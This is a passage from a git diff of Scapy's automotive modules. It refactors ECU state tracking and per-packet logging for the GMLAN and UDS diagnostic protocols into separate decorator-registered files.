+ self.__basecls = basecls # type: Type[Packet] + self.__supported_responses = supported_responses self.sniff_options["timeout"] = timeout - self.sniff_options["opened_socket"] = self.sockets + self.sniff_options["opened_socket"] = self.__sockets + + @property + def state(self): + # type: () -> EcuState + return self.__ecu_state def is_request(self, req): - return req.__class__ == self.basecls + # type: (Packet) -> bool + return isinstance(req, self.__basecls) def print_reply(self, req, reply): + # type: (Packet, PacketList) -> None print("%s ==> %s" % (req.summary(), [res.summary() for res in reply])) def make_reply(self, req): - if self.supported_responses is not None: - for resp in self.supported_responses: + # type: (Packet) -> PacketList + """ + Checks if a given request can be answered by the internal list of + EcuResponses. First, it's evaluated if the internal EcuState of this + AnsweringMachine is supported by an EcuResponse, next it's evaluated if + a request answers the key_response of this EcuResponse object. The + first fitting EcuResponse is used. If this EcuResponse modified the + EcuState, the internal EcuState of this AnsweringMachine is updated, + and the list of response Packets of the selected EcuResponse is + returned. If no EcuResponse if found, a PacketList with a generic + NegativeResponse is returned. + :param req: A request packet + :return: A list of response packets + """ + if self.__supported_responses is not None: + for resp in self.__supported_responses: if not isinstance(resp, EcuResponse): - raise Scapy_Exception("Unsupported type for response. " - "Please use `EcuResponse` objects. ") - - if not resp.in_correct_session(self.ecu_state.current_session): - continue + raise TypeError("Unsupported type for response. " + "Please use `EcuResponse` objects.") - if not resp.has_security_access( - self.ecu_state.current_security_level): + if not resp.supports_state(self.__ecu_state): continue if not resp.answers(req): continue - for r in resp.responses: - for layer in r.layers(): - if hasattr(layer, "modifies_ecu_state"): - layer.modifies_ecu_state(r, self.ecu_state) + EcuState.get_modified_ecu_state( + resp.key_response, req, self.__ecu_state, True) return resp.responses - return PacketList([self.basecls(b"\x7f" + bytes(req)[0:1] + b"\x10")]) + return PacketList([self.__basecls( + b"\x7f" + bytes(req)[0:1] + b"\x10")]) def send_reply(self, reply): + # type: (PacketList) -> None + """ + Sends all Packets of a EcuResponse object. This allows to send multiple + packets up on a request. If the list contains more than one packet, + a random time between each packet is waited until the next packet will + be sent. + :param reply: List of packets to be sent. + """ for p in reply: time.sleep(conf.contribs['EcuAnsweringMachine']['send_delay']) if len(reply) > 1: time.sleep(random.uniform(0.01, 0.5)) - self.main_socket.send(p) + if self.__main_socket: + self.__main_socket.send(p) diff --git a/scapy/contrib/automotive/gm/gmlan.py b/scapy/contrib/automotive/gm/gmlan.py index cd8eb516516..ddd78a59151 100644 --- a/scapy/contrib/automotive/gm/gmlan.py +++ b/scapy/contrib/automotive/gm/gmlan.py @@ -113,19 +113,6 @@ def hashret(self): return struct.pack('B', self.requestServiceId) return struct.pack('B', self.service & ~0x40) - @staticmethod - def modifies_ecu_state(pkt, ecu): - if pkt.service == 0x50: - ecu.current_session = 3 - elif pkt.service == 0x60: - ecu.current_session = 1 - ecu.communication_control = 0 - ecu.current_security_level = 0 - elif pkt.service == 0x68: - ecu.communication_control = 1 - elif pkt.service == 0xe5: - ecu.current_session = 2 - # ########################IDO################################### class GMLAN_IDO(Packet): @@ -138,11 +125,6 @@ class GMLAN_IDO(Packet): ByteEnumField('subfunction', 0, subfunctions) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - pkt.sprintf("%GMLAN_IDO.subfunction%") - bind_layers(GMLAN, GMLAN_IDO, service=0x10) @@ -172,11 +154,6 @@ class GMLAN_RFRD(Packet): lambda pkt: pkt.subfunction == 0x02) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - pkt.sprintf("%GMLAN_RFRD.subfunction%") - bind_layers(GMLAN, GMLAN_RFRD, service=0x12) @@ -191,11 +168,6 @@ def answers(self, other): return other.__class__ == GMLAN_RFRD and \ other.subfunction == self.subfunction - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - pkt.sprintf("%GMLAN_RFRDPR.subfunction%") - bind_layers(GMLAN, GMLAN_RFRDPR, service=0x52) @@ -318,11 +290,6 @@ class GMLAN_RDBI(Packet): XByteEnumField('dataIdentifier', 0, dataIdentifiers) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - pkt.sprintf("%GMLAN_RDBI.dataIdentifier%") - bind_layers(GMLAN, GMLAN_RDBI, service=0x1A) @@ -333,12 +300,6 @@ class GMLAN_RDBIPR(Packet): XByteEnumField('dataIdentifier', 0, GMLAN_RDBI.dataIdentifiers), ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - (pkt.sprintf("%GMLAN_RDBIPR.dataIdentifier%"), - bytes(pkt[1].payload)) - def answers(self, other): return other.__class__ == GMLAN_RDBI and \ other.dataIdentifier == self.dataIdentifier @@ -361,11 +322,6 @@ class GMLAN_RDBPI(Packet): dataIdentifiers)) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - pkt.sprintf("%GMLAN_RDBPI.identifiers%") - bind_layers(GMLAN, GMLAN_RDBPI, service=0x22) @@ -376,11 +332,6 @@ class GMLAN_RDBPIPR(Packet): XShortEnumField('parameterIdentifier', 0, GMLAN_RDBPI.dataIdentifiers), ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - pkt.sprintf("%GMLAN_RDBPIPR.parameterIdentifier%") - def answers(self, other): return other.__class__ == GMLAN_RDBPI and \ self.parameterIdentifier in other.identifiers @@ -407,11 +358,6 @@ class GMLAN_RDBPKTI(Packet): lambda pkt: pkt.subfunction > 0x0) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - pkt.sprintf("%GMLAN_RDBPKTI.subfunction%") - bind_layers(GMLAN, GMLAN_RDBPKTI, service=0xAA) @@ -433,11 +379,6 @@ class GMLAN_RMBA(Packet): XShortField('memorySize', 0), ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - pkt.sprintf("%GMLAN_RMBA.memoryAddress%") - bind_layers(GMLAN, GMLAN_RMBA, service=0x23) @@ -462,11 +403,6 @@ def answers(self, other): return other.__class__ == GMLAN_RMBA and \ other.memoryAddress == self.memoryAddress - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - (pkt.sprintf("%GMLAN_RMBAPR.memoryAddress%"), pkt.dataRecord) - bind_layers(GMLAN, GMLAN_RMBAPR, service=0x63) @@ -495,15 +431,6 @@ class GMLAN_SA(Packet): lambda pkt: pkt.subfunction % 2 == 0) ] - @staticmethod - def get_log(pkt): - if pkt.subfunction % 2 == 1: - return pkt.sprintf("%GMLAN.service%"), \ - (pkt.subfunction, None) - else: - return pkt.sprintf("%GMLAN.service%"), \ - (pkt.subfunction, pkt.securityKey) - bind_layers(GMLAN, GMLAN_SA, service=0x27) @@ -520,20 +447,6 @@ def answers(self, other): return other.__class__ == GMLAN_SA \ and other.subfunction == self.subfunction - @staticmethod - def get_log(pkt): - if pkt.subfunction % 2 == 0: - return pkt.sprintf("%GMLAN.service%"), \ - (pkt.subfunction, None) - else: - return pkt.sprintf("%GMLAN.service%"), \ - (pkt.subfunction, pkt.securitySeed) - - @staticmethod - def modifies_ecu_state(pkt, ecu): - if pkt.subfunction % 2 == 0: - ecu.current_security_level = pkt.subfunction - bind_layers(GMLAN, GMLAN_SAPR, service=0x67) @@ -546,11 +459,6 @@ class GMLAN_DDM(Packet): StrField('PIDData', b'\x00\x00') ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - (pkt.sprintf("%GMLAN_DDM.DPIDIdentifier%"), pkt.PIDData) - bind_layers(GMLAN, GMLAN_DDM, service=0x2C) @@ -561,11 +469,6 @@ class GMLAN_DDMPR(Packet): XByteField('DPIDIdentifier', 0) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - pkt.sprintf("%GMLAN_DDMPR.DPIDIdentifier%") - def answers(self, other): return other.__class__ == GMLAN_DDM \ and other.DPIDIdentifier == self.DPIDIdentifier @@ -592,11 +495,6 @@ class GMLAN_DPBA(Packet): XByteField('memorySize', 0), ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - (pkt.parameterIdentifier, pkt.memoryAddress, pkt.memorySize) - bind_layers(GMLAN, GMLAN_DPBA, service=0x2D) @@ -607,10 +505,6 @@ class GMLAN_DPBAPR(Packet): XShortField('parameterIdentifier', 0), ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), pkt.parameterIdentifier - def answers(self, other): return other.__class__ == GMLAN_DPBA \ and other.parameterIdentifier == self.parameterIdentifier @@ -636,11 +530,6 @@ class GMLAN_RD(Packet): XIntField('memorySize', 0)) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - (pkt.dataFormatIdentifier, pkt.memorySize) - bind_layers(GMLAN, GMLAN_RD, service=0x34) @@ -667,12 +556,6 @@ class GMLAN_TD(Packet): StrField("dataRecord", b"") ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - (pkt.sprintf("%GMLAN_TD.subfunction%"), pkt.startingAddress, - pkt.dataRecord) - bind_layers(GMLAN, GMLAN_TD, service=0x36) @@ -685,11 +568,6 @@ class GMLAN_WDBI(Packet): StrField("dataRecord", b'') ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - (pkt.sprintf("%GMLAN_WDBI.dataIdentifier%"), pkt.dataRecord) - bind_layers(GMLAN, GMLAN_WDBI, service=0x3B) @@ -700,11 +578,6 @@ class GMLAN_WDBIPR(Packet): XByteEnumField('dataIdentifier', 0, GMLAN_RDBI.dataIdentifiers) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - pkt.sprintf("%GMLAN_WDBIPR.dataIdentifier%") - def answers(self, other): return other.__class__ == GMLAN_WDBI \ and other.dataIdentifier == self.dataIdentifier @@ -732,11 +605,6 @@ class GMLAN_RPSPR(Packet): ByteEnumField('programmedState', 0, programmedStates), ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - pkt.sprintf("%GMLAN_RPSPR.programmedState%") - bind_layers(GMLAN, GMLAN_RPSPR, service=0xE2) @@ -753,11 +621,6 @@ class GMLAN_PM(Packet): ByteEnumField('subfunction', 0, subfunctions), ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - pkt.sprintf("%GMLAN_PM.subfunction%") - bind_layers(GMLAN, GMLAN_PM, service=0xA5) @@ -774,11 +637,6 @@ class GMLAN_RDI(Packet): ByteEnumField('subfunction', 0, subfunctions) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - pkt.sprintf("%GMLAN_RDI.subfunction%") - bind_layers(GMLAN, GMLAN_RDI, service=0xA9) @@ -824,11 +682,6 @@ class GMLAN_DC(Packet): StrFixedLenField('CPIDControlBytes', b"", 5) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - pkt.sprintf("%GMLAN_DC.CPIDNumber%") - bind_layers(GMLAN, GMLAN_DC, service=0xAE) @@ -839,11 +692,6 @@ class GMLAN_DCPR(Packet): XByteField('CPIDNumber', 0) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - pkt.sprintf("%GMLAN_DCPR.CPIDNumber%") - def answers(self, other): return other.__class__ == GMLAN_DC \ and other.CPIDNumber == self.CPIDNumber @@ -877,12 +725,6 @@ class GMLAN_NR(Packet): ShortField('deviceControlLimitExceeded', 0) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%GMLAN.service%"), \ - (pkt.sprintf("%GMLAN_NR.requestServiceId%"), - pkt.sprintf("%GMLAN_NR.returnCode%")) - def answers(self, other): return self.requestServiceId == other.service and \ (self.returnCode != 0x78 or diff --git a/scapy/contrib/automotive/gm/gmlan_ecu_states.py b/scapy/contrib/automotive/gm/gmlan_ecu_states.py new file mode 100644 index 00000000000..6d9e40bf053 --- /dev/null +++ b/scapy/contrib/automotive/gm/gmlan_ecu_states.py @@ -0,0 +1,36 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = GMLAN EcuState modifications +# scapy.contrib.status = library + +from scapy.packet import Packet +from scapy.contrib.automotive.ecu import EcuState +from scapy.contrib.automotive.gm.gmlan import GMLAN, GMLAN_SAPR + + +@EcuState.extend_pkt_with_modifier(GMLAN) +def GMLAN_modify_ecu_state(self, req, state): + # type: (Packet, Packet, EcuState) -> None + if self.service == 0x50: + state.session = 3 # type: ignore + elif self.service == 0x60: + state.reset() + state.session = 1 # type: ignore + elif self.service == 0x68: + state.communication_control = 1 # type: ignore + elif self.service == 0xe5: + state.session = 2 # type: ignore + elif self.service == 0x74: + state.request_download = 1 # type: ignore + elif self.service == 0x7e: + state.tp = 1 # type: ignore + + +@EcuState.extend_pkt_with_modifier(GMLAN_SAPR) +def GMLAN_SAPR_modify_ecu_state(self, req, state): + # type: (Packet, Packet, EcuState) -> None + if self.subfunction % 2 == 0: + state.security_level = self.subfunction # type: ignore diff --git a/scapy/contrib/automotive/gm/gmlan_logging.py b/scapy/contrib/automotive/gm/gmlan_logging.py new file mode 100644 index 00000000000..de78912b20b --- /dev/null +++ b/scapy/contrib/automotive/gm/gmlan_logging.py @@ -0,0 +1,209 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = GMLAN Ecu logging additions +# scapy.contrib.status = library + + +from scapy.contrib.automotive.gm.gmlan import GMLAN_SA, GMLAN_IDO, GMLAN_DC, \ + GMLAN_NR, GMLAN_RD, GMLAN_TD, GMLAN_DCPR, GMLAN_DPBA, GMLAN_DPBAPR, \ + GMLAN_RPSPR, GMLAN_RDI, GMLAN_WDBI, GMLAN_WDBIPR, GMLAN_PM, GMLAN_SAPR, \ + GMLAN_RDBI, GMLAN_RDBIPR, GMLAN_RDBPI, GMLAN_RDBPIPR, GMLAN_RDBPKTI, \ + GMLAN_RFRD, GMLAN_RFRDPR, GMLAN_RMBA, GMLAN_RMBAPR, GMLAN_DDM, GMLAN_DDMPR +from scapy.packet import Packet +from scapy.compat import Tuple, Any +from scapy.contrib.automotive.ecu import Ecu + + +@Ecu.extend_pkt_with_logging(GMLAN_IDO) +def GMLAN_IDO_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + self.sprintf("%GMLAN_IDO.subfunction%") + + +@Ecu.extend_pkt_with_logging(GMLAN_RFRD) +def GMLAN_RFRD_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + self.sprintf("%GMLAN_RFRD.subfunction%") + + +@Ecu.extend_pkt_with_logging(GMLAN_RFRDPR) +def GMLAN_RFRDPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + self.sprintf("%GMLAN_RFRDPR.subfunction%") + + +@Ecu.extend_pkt_with_logging(GMLAN_RDBI) +def GMLAN_RDBI_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + self.sprintf("%GMLAN_RDBI.dataIdentifier%") + + +@Ecu.extend_pkt_with_logging(GMLAN_RDBIPR) +def GMLAN_RDBIPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + (self.sprintf("%GMLAN_RDBIPR.dataIdentifier%"), + bytes(self.load)) + + +@Ecu.extend_pkt_with_logging(GMLAN_RDBPI) +def GMLAN_RDBPI_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + self.sprintf("%GMLAN_RDBPI.identifiers%") + + +@Ecu.extend_pkt_with_logging(GMLAN_RDBPIPR) +def GMLAN_RDBPIPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + self.sprintf("%GMLAN_RDBPIPR.parameterIdentifier%") + + +@Ecu.extend_pkt_with_logging(GMLAN_RDBPKTI) +def GMLAN_RDBPKTI_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + self.sprintf("%GMLAN_RDBPKTI.subfunction%") + + +@Ecu.extend_pkt_with_logging(GMLAN_RMBA) +def GMLAN_RMBA_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + self.sprintf("%GMLAN_RMBA.memoryAddress%") + + +@Ecu.extend_pkt_with_logging(GMLAN_RMBAPR) +def GMLAN_RMBAPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + (self.sprintf("%GMLAN_RMBAPR.memoryAddress%"), self.dataRecord) + + +@Ecu.extend_pkt_with_logging(GMLAN_SA) +def GMLAN_SA_get_log(self): + # type: (Packet) -> Tuple[str, Any] + if self.subfunction % 2 == 1: + return self.sprintf("%GMLAN.service%"), \ + (self.subfunction, None) + else: + return self.sprintf("%GMLAN.service%"), \ + (self.subfunction, self.securityKey) + + +@Ecu.extend_pkt_with_logging(GMLAN_SAPR) +def GMLAN_SAPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + if self.subfunction % 2 == 0: + return self.sprintf("%GMLAN.service%"), \ + (self.subfunction, None) + else: + return self.sprintf("%GMLAN.service%"), \ + (self.subfunction, self.securitySeed) + + +@Ecu.extend_pkt_with_logging(GMLAN_DDM) +def GMLAN_DDM_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + (self.sprintf("%GMLAN_DDM.DPIDIdentifier%"), self.PIDData) + + +@Ecu.extend_pkt_with_logging(GMLAN_DDMPR) +def GMLAN_DDMPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + self.sprintf("%GMLAN_DDMPR.DPIDIdentifier%") + + +@Ecu.extend_pkt_with_logging(GMLAN_DPBA) +def GMLAN_DPBA_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + (self.parameterIdentifier, self.memoryAddress, self.memorySize) + + +@Ecu.extend_pkt_with_logging(GMLAN_DPBAPR) +def GMLAN_DPBAPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), self.parameterIdentifier + + +@Ecu.extend_pkt_with_logging(GMLAN_RD) +def GMLAN_RD_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + (self.dataFormatIdentifier, self.memorySize) + + +@Ecu.extend_pkt_with_logging(GMLAN_TD) +def GMLAN_TD_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + (self.sprintf("%GMLAN_TD.subfunction%"), self.startingAddress, + self.dataRecord) + + +@Ecu.extend_pkt_with_logging(GMLAN_WDBI) +def GMLAN_WDBI_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + (self.sprintf("%GMLAN_WDBI.dataIdentifier%"), self.dataRecord) + + +@Ecu.extend_pkt_with_logging(GMLAN_WDBIPR) +def GMLAN_WDBIPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + self.sprintf("%GMLAN_WDBIPR.dataIdentifier%") + + +@Ecu.extend_pkt_with_logging(GMLAN_RPSPR) +def GMLAN_RPSPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + self.sprintf("%GMLAN_RPSPR.programmedState%") + + +@Ecu.extend_pkt_with_logging(GMLAN_PM) +def GMLAN_PM_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + self.sprintf("%GMLAN_PM.subfunction%") + + +@Ecu.extend_pkt_with_logging(GMLAN_RDI) +def GMLAN_RDI_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + self.sprintf("%GMLAN_RDI.subfunction%") + + +@Ecu.extend_pkt_with_logging(GMLAN_DC) +def GMLAN_DC_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + self.sprintf("%GMLAN_DC.CPIDNumber%") + + +@Ecu.extend_pkt_with_logging(GMLAN_DCPR) +def GMLAN_DCPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + self.sprintf("%GMLAN_DCPR.CPIDNumber%") + + +@Ecu.extend_pkt_with_logging(GMLAN_NR) +def GMLAN_NR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%GMLAN.service%"), \ + (self.sprintf("%GMLAN_NR.requestServiceId%"), + self.sprintf("%GMLAN_NR.returnCode%")) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 6be72c018d5..f6437404f9e 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -20,7 +20,7 @@ from scapy.error import log_loading from scapy.utils import PeriodicSenderThread from scapy.contrib.isotp import ISOTP -from scapy.compat import Dict, Union, Tuple, Any +from scapy.compat import Dict, Union """ UDS @@ -133,12 +133,6 @@ class UDS_DSC(Packet): ByteEnumField('diagnosticSessionType', 0, diagnosticSessionTypes) ] - @staticmethod - def get_log(pkt): - # type: (UDS_DSC) -> Tuple[str, Any] - return pkt.sprintf("%UDS.service%"), \ - pkt.sprintf("%UDS_DSC.diagnosticSessionType%") - bind_layers(UDS, UDS_DSC, service=0x10) @@ -155,15 +149,6 @@ def answers(self, other): return other.__class__ == UDS_DSC and \ other.diagnosticSessionType == self.diagnosticSessionType - @staticmethod - def modifies_ecu_state(pkt, ecu): - ecu.current_session = pkt.diagnosticSessionType - - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), \ - pkt.sprintf("%UDS_DSCPR.diagnosticSessionType%") - bind_layers(UDS, UDS_DSCPR, service=0x50) @@ -184,11 +169,6 @@ class UDS_ER(Packet): ByteEnumField('resetType', 0, resetTypes) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), \ - pkt.sprintf("%UDS_ER.resetType%") - bind_layers(UDS, UDS_ER, service=0x11) @@ -204,15 +184,6 @@ class UDS_ERPR(Packet): def answers(self, other): return other.__class__ == UDS_ER - @staticmethod - def modifies_ecu_state(_, ecu): - ecu.reset() - - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), \ - pkt.sprintf("%UDS_ER.resetType%") - bind_layers(UDS, UDS_ERPR, service=0x51) @@ -228,15 +199,6 @@ class UDS_SA(Packet): lambda pkt: pkt.securityAccessType % 2 == 0) ] - @staticmethod - def get_log(pkt): - if pkt.securityAccessType % 2 == 1: - return pkt.sprintf("%UDS.service%"),\ - (pkt.securityAccessType, None) - else: - return pkt.sprintf("%UDS.service%"),\ - (pkt.securityAccessType, pkt.securityKey) - bind_layers(UDS, UDS_SA, service=0x27) @@ -253,20 +215,6 @@ def answers(self, other): return other.__class__ == UDS_SA \ and other.securityAccessType == self.securityAccessType - @staticmethod - def modifies_ecu_state(pkt, ecu): - if pkt.securityAccessType % 2 == 0: - ecu.current_security_level = pkt.securityAccessType - - @staticmethod - def get_log(pkt): - if pkt.securityAccessType % 2 == 0: - return pkt.sprintf("%UDS.service%"),\ - (pkt.securityAccessType, None) - else: - return pkt.sprintf("%UDS.service%"),\ - (pkt.securityAccessType, pkt.securitySeed) - bind_layers(UDS, UDS_SAPR, service=0x67) @@ -308,11 +256,6 @@ class UDS_CC(Packet): 15: 'Disable/Enable network'}) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), \ - pkt.sprintf("%UDS_CC.controlType%") - bind_layers(UDS, UDS_CC, service=0x28) @@ -327,15 +270,6 @@ def answers(self, other): return other.__class__ == UDS_CC \ and other.controlType == self.controlType - @staticmethod - def modifies_ecu_state(pkt, ecu): - ecu.communication_control = pkt.controlType - - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), \ - pkt.sprintf("%UDS_CCPR.controlType%") - bind_layers(UDS, UDS_CCPR, service=0x68) @@ -347,10 +281,6 @@ class UDS_TP(Packet): ByteField('subFunction', 0) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), pkt.subFunction - bind_layers(UDS, UDS_TP, service=0x3E) @@ -364,10 +294,6 @@ class UDS_TPPR(Packet): def answers(self, other): return other.__class__ == UDS_TP - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), pkt.zeroSubFunction - bind_layers(UDS, UDS_TPPR, service=0x7E) @@ -418,10 +344,6 @@ class UDS_SDT(Packet): StrField('securityDataRequestRecord', b"") ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), pkt.securityDataRequestRecord - bind_layers(UDS, UDS_SDT, service=0x84) @@ -435,10 +357,6 @@ class UDS_SDTPR(Packet): def answers(self, other): return other.__class__ == UDS_SDT - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), pkt.securityDataResponseRecord - bind_layers(UDS, UDS_SDTPR, service=0xC4) @@ -456,11 +374,6 @@ class UDS_CDTCS(Packet): StrField('DTCSettingControlOptionRecord', b"") ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), \ - pkt.sprintf("%UDS_CDTCS.DTCSettingType%") - bind_layers(UDS, UDS_CDTCS, service=0x85) @@ -474,11 +387,6 @@ class UDS_CDTCSPR(Packet): def answers(self, other): return other.__class__ == UDS_CDTCS - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), \ - pkt.sprintf("%UDS_CDTCSPR.DTCSettingType%") - bind_layers(UDS, UDS_CDTCSPR, service=0xC5) @@ -539,11 +447,6 @@ class UDS_LC(Packet): lambda pkt: pkt.linkControlType == 0x2) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), \ - pkt.sprintf("%UDS.linkControlType%") - bind_layers(UDS, UDS_LC, service=0x87) @@ -558,11 +461,6 @@ def answers(self, other): return other.__class__ == UDS_LC \ and other.linkControlType == self.linkControlType - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), \ - pkt.sprintf("%UDS.linkControlType%") - bind_layers(UDS, UDS_LCPR, service=0xC7) @@ -577,11 +475,6 @@ class UDS_RDBI(Packet): dataIdentifiers)) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), \ - pkt.sprintf("%UDS_RDBI.identifiers%") - bind_layers(UDS, UDS_RDBI, service=0x22) @@ -597,11 +490,6 @@ def answers(self, other): return other.__class__ == UDS_RDBI \ and self.dataIdentifier in other.identifiers - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), \ - pkt.sprintf("%UDS_RDBIPR.dataIdentifier%") - bind_layers(UDS, UDS_RDBIPR, service=0x62) @@ -630,12 +518,6 @@ class UDS_RMBA(Packet): lambda pkt: pkt.memorySizeLen == 4), ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), \ - (getattr(pkt, "memoryAddress%d" % pkt.memoryAddressLen), - getattr(pkt, "memorySize%d" % pkt.memorySizeLen)) - bind_layers(UDS, UDS_RMBA, service=0x23) @@ -649,10 +531,6 @@ class UDS_RMBAPR(Packet): def answers(self, other): return other.__class__ == UDS_RMBA - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), pkt.dataRecord - bind_layers(UDS, UDS_RMBAPR, service=0x63) @@ -762,11 +640,6 @@ class UDS_WDBI(Packet): UDS_RDBI.dataIdentifiers) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), \ - pkt.sprintf("%UDS_WDBI.dataIdentifier%") - bind_layers(UDS, UDS_WDBI, service=0x2E) @@ -782,11 +655,6 @@ def answers(self, other): return other.__class__ == UDS_WDBI \ and other.dataIdentifier == self.dataIdentifier - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), \ - pkt.sprintf("%UDS_WDBIPR.dataIdentifier%") - bind_layers(UDS, UDS_WDBIPR, service=0x6E) @@ -817,12 +685,6 @@ class UDS_WMBA(Packet): ] - @staticmethod - def get_log(pkt): - addr = getattr(pkt, "memoryAddress%d" % pkt.memoryAddressLen) - size = getattr(pkt, "memorySize%d" % pkt.memorySizeLen) - return pkt.sprintf("%UDS.service%"), (addr, size, pkt.dataRecord) - bind_layers(UDS, UDS_WMBA, service=0x3D) @@ -855,12 +717,6 @@ def answers(self, other): and other.memorySizeLen == self.memorySizeLen \ and other.memoryAddressLen == self.memoryAddressLen - @staticmethod - def get_log(pkt): - addr = getattr(pkt, "memoryAddress%d" % pkt.memoryAddressLen) - size = getattr(pkt, "memorySize%d" % pkt.memorySizeLen) - return pkt.sprintf("%UDS.service%"), (addr, size) - bind_layers(UDS, UDS_WMBAPR, service=0x7D) @@ -874,12 +730,6 @@ class UDS_CDTCI(Packet): ByteField('groupOfDTCLowByte', 0), ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), (pkt.groupOfDTCHighByte, - pkt.groupOfDTCMiddleByte, - pkt.groupOfDTCLowByte) - bind_layers(UDS, UDS_CDTCI, service=0x14) @@ -890,10 +740,6 @@ class UDS_CDTCIPR(Packet): def answers(self, other): return other.__class__ == UDS_CDTCI - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), None - bind_layers(UDS, UDS_CDTCIPR, service=0x54) @@ -947,10 +793,6 @@ class UDS_RDTCI(Packet): lambda pkt: 